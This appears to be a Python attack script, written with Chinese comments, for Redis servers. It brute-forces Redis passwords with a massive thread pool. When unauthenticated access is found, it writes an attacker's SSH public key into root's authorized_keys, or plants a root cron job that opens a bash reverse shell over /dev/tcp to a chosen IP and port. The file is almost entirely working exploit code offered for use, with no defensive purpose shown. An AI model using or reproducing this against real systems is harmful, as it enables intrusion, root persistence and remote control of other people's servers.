#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""  
@Project : pythonProject1
@File : redistools.py
@Author : 蓝精灵
@Time : 2025/11/2 19:29  
@脚本说明 : 
"""
from redis import Redis
import concurrent.futures


def redis_brute(ip_host="127.0.0.1", port=6379, password="", timeout=1):
    try:
        redis_cli = Redis(host=ip_host,
                          port=port,
                          password=password,
                          db=10,
                          socket_timeout=timeout,
                          socket_connect_timeout=timeout
                          )
        if redis_cli.ping():
            print(f"[+] Redis存在弱口令,密码为：{password}")
            choice = input("是否尝试未授权访问漏洞? (Y / N)\n")
            if choice.upper() == "Y":
                info = redis_cli.info()
                print(f"Redis版本: {info['redis_version']}")
                print(f"Redis运行模式: {info['redis_mode']}")
                print(f"操作系统: {info['os']}")
                print(f"Redis当前dir: {redis_cli.config_get('dir')['dir']}")
                print(f"Redis当前dbfilename:{redis_cli.config_get('dbfilename')['dbfilename']}")
                print(f"Redis当前安全模式:{redis_cli.config_get('protected-mode')['protected-mode']}")
                if "Linux" in info['os'] and info['redis_mode'] == "standalone" and \
                        redis_cli.config_get('protected-mode')['protected-mode'] == 'no':
                    print("[+] Redis未授权访问漏洞存在")
                    # 利用漏洞 1. 公私钥 2. 定时任务
                    vulchoice = input("请选择利用方式: 1. 公私钥 2. 定时任务\n")
                    if vulchoice == "1":
                        print("====== 公私钥利用方式 ======")
                        redis_cli.config_set("dir", "/root/.ssh")
                        redis_cli.config_set("dbfilename", "authorized_keys")
                        # 保存公钥为 redis的值
                        with open(file="hacker.pub", mode="r", encoding="utf-8") as pubkey:
                            redis_cli.set("hacker", f"\n\n\n\n{pubkey.read()}\n\n\n")
                        # 保存 注意空天空地
                        if redis_cli.save():
                            print("[+] 公私钥利用成功,请使用私钥连接")
                        else:
                            print("[-] 公私钥利用失败")
                    elif vulchoice == "2":
                        print("====== 定时任务利用方式 ======")
                        redis_cli.config_set("dir", "/var/spool/cron")
                        redis_cli.config_set("dbfilename", "root")
                        # 配置 bash 反弹
                        reverse_ip = input("请输入反弹IP:\n")
                        reverse_port = input("请输入反弹端口:\n")
                        cron = f"*/1 * * * * bash -i >& /dev/tcp/{reverse_ip}/{reverse_port} 0>&1"
                        # 保存定时任务为 redis的值
                        redis_cli.set("hacker", f"\n\n\n\n{cron}\n\n\n")
                        # 保存 注意空天空地
                        if redis_cli.save():
                            print(f"[+] 定时任务利用成功,监听地址为: {reverse_ip}:{reverse_port}")
                        else:
                            print("[-] 定时任务利用失败")
                    else:
                        print("输入错误,程序退出")
                        exit()
                else:
                    print("[-] Redis未授权访问漏洞不存在")
            elif choice.upper() == "N":
                print("程序退出")
                exit()
            else:
                print("输入错误,程序退出")
                exit()
    except:
        pass


def redis_brute_run(ip_host, port, passwds):
    with concurrent.futures.ThreadPoolExecutor(max_workers=10000) as executor:
        for passwd in passwds:
            executor.submit(redis_brute, ip_host, port, passwd.strip())
